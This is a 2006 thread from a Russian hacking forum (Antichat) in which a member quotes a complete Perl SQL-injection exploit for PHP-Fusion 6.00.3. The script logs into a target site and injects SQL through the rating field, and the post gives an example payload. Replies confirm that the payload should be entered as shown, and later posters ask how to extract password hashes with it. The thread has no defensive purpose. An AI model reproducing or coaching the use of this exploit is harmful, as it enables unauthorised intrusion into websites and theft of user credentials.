HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по использованию сплоита для php-fusion 6.00.3
  #1  
Старый 20.02.2006, 19:46
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию Вопрос по использованию сплоита для php-fusion 6.00.3

Парни сорри за ламерство но я уже не знаю что делать, значит вот сам сплоит.
Цитата:
#!/usr/bin/perl
#Exploit for PHP-Fusion 6.00.3 Released
#Coded by:krasza[krasza@gmail.com]
#Greetz: http://www.securityreason.com
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
if(!$ARGV[3]){
print<<EOF;
Exploit for PHP-Fusion 6.00.3 Released
Coded by krasza
Contact me:krasza\@gmail.com
Greets:
-http://www.securityreason.com
-http://www.revival.pl
-mulander

Usage:
perl phpfusion.pl url login pass sql
url-url hack site with [php fusion's directory]
login-your login
pass-your password
sql-[sql code]
Example:
\t perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
EOF
exit;
}
my $url=shift;
my $login=shift;
my $haslo=shift;
my $sql=shift;
$url=$url."/news.php?readmore=1";
my $ua = new LWP::UserAgent;
$ua->agent("Exploit for PHP-Fusion" . $ua->agent);
$ua->cookie_jar( HTTP::Cookies->new('file' => 'ciasteczka.txt','autosave' => 1,));
print "[+]Connecting to $url...\n";

my $zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj');
my $wynik = $ua->request($zadanie);
if ($wynik->is_success){
print "[+]Connected to $url\n";
#LOGIN JEST PRAWIDLOWE
}else{
print "[-]Connected failed to $url\n";
print "[-]Error:".$wynik->message."\n";
exit;
}
print "[+] Logging In $url...\n";
$zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%E A');
my $wynik2 = $ua->request($zadanie);
if ($wynik2->is_success){
print "[+] Sql query isn't done!\n";
}else{
print "[-]Sql query is done\n";
}
Но никак не пойму что именно вводить.
perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/* смущают последние строчки. Подскажите кто знает.
 
Ответить с цитированием

  #2  
Старый 20.02.2006, 19:56
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
С нами: 10716379

Репутация: 31
По умолчанию

А что там смущает если там написано Example:
шо значит пример!
 
Ответить с цитированием

  #3  
Старый 20.02.2006, 20:15
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

Цитата:
perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
все правильно, он работает со скулей, все норма, так что вводи как показано в примере
 
Ответить с цитированием

  #4  
Старый 20.02.2006, 21:45
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
С нами: 10819920

Репутация: 83
По умолчанию

Спасиб Киборк что понял меня правильно, сейчас опробую и вывешу результат и тему можно будет закрывать
 
Ответить с цитированием

  #5  
Старый 21.05.2006, 00:13
Mina
Новичок
Регистрация: 13.10.2005
Сообщений: 13
С нами: 10829025

Репутация: 0
По умолчанию

A што дальше?
Код:
[-]Sql query is done
 
Ответить с цитированием

  #6  
Старый 21.05.2006, 19:10
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами: 10533245

Репутация: 773


По умолчанию

DimaHbl4 ну что может сплойт делать или позволяет выполнять команды или лог\пасс\хеш выдаёт
 
Ответить с цитированием

  #7  
Старый 06.06.2006, 03:09
Susel
Новичок
Регистрация: 17.12.2005
Сообщений: 17
С нами: 10735195

Репутация: 1
По умолчанию

Помогите.... Этот эксплоит приведённый выше, что делает.....добывает хеш??? Если да то, где он его сохраняет... После выполнения появляется файл тип лога, но там ни хрена нет... Help Please!!! )))
 
Ответить с цитированием

  #8  
Старый 07.08.2006, 13:21
netadmin
Новичок
Регистрация: 28.09.2005
Сообщений: 29
С нами: 10850088

Репутация: 0
По умолчанию

a kntonibud znait kakuiu sql query nada dla etava vipolnit shtob dastat md5 pwd
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.